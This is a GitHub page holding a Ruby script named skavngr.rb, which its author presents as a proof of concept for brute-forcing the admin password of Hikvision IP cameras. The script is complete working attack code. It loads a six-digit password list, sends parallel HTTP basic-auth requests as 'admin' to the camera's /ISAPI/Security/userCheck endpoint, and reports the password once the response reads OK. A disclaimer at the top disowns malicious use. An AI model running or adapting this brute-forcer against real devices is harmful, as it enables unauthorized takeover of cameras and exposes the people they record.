-
Notifications
You must be signed in to change notification settings - Fork 11
/
skavngr.rb
107 lines (72 loc) · 3.31 KB
/
skavngr.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
#!/usr/bin/ruby
###################################################################################################
#Author : Shankar Damodaran
#Codename : Scavenger 1.0a
#Description : A brute force script that attempts to break in Hikvision IP Camera Routers
#Filename : skavngr.rb
#Disclaimer : This proof-of-concept is not intended to be used for malicious purposes. The author is not responsible for any loss or damage caused.
###################################################################################################
require 'typhoeus'
require 'colorize'
######### Configuration Begins ########
### Subject your target ip address ###
target = 'targetipaddressoftherouter'
### Provide the password list ###
file_path = 'passwd.lst' # A sample 6 digit passfile ranging from 000000 to 999999
######## Configuration Ends ##########
# The passwords list container
passwords = []
puts "Initializing the password list. Please wait...";
# Reading the passwords from the list, cleaning up and storing it in the array.
def read_array(file_path,passwords)
File.readlines(file_path).map do |line|
passwords << line.unpack("C*").pack("U*").strip
end
end
# The actual call to the above method
read_array(file_path,passwords)
time = Time.new
totpasswords = passwords.length
puts "\n#{totpasswords} passwords loaded. \nBruteforce Sequence Initialization Started at #{time.inspect}"
# Chopping the array in certain sets to fasten up parallelization
new_pass = passwords.each_slice((totpasswords/2).round).to_a
# The module that does the parallelization using Typhoeus Hydra
def multi_channel_split(target,req,passwords)
i=0
j=0
# The default concurrency is 200, I had it set to 20. Try increasing this parameter to experiment the performance kick.
hydra = Typhoeus::Hydra.new(max_concurrency: 20)
# I am setting the verbosity and memoisation to 0. Memoisation should be set to false for calls with different set of parameters.
Typhoeus.configure do |config|
config.verbose = false
config.memoize = false
end
requests = req.times.map {
request = Typhoeus::Request.new("http://#{target}/ISAPI/Security/userCheck",
method: :get,
userpwd: "admin:#{passwords[i]}")
i+=1
# The requests are queued and once when it is out of the loop, it is subjected to hydra.run
hydra.queue(request)
request
}
# Running Hydra every once after piling up the requests from the slice
hydra.run
responses = requests.map { |request|
# If we get a response similar to this means the password has found.
if request.response.body.index('<statusString>OK</statusString>') != nil
time = Time.new
puts "\nPassword Found at #{time.inspect}!: #{passwords[j]} \n".green
abort
end
j+=1
}
# End of the parallelization module
end
# The chopped array is subjected here to call the module.
new_pass.each do |req|
multi_channel_split(target,req.length,req)
end
puts "\nPassword was not found in this list. Subject another file to start a new operation.".red
# End of Proof of Concept
####################################################################################################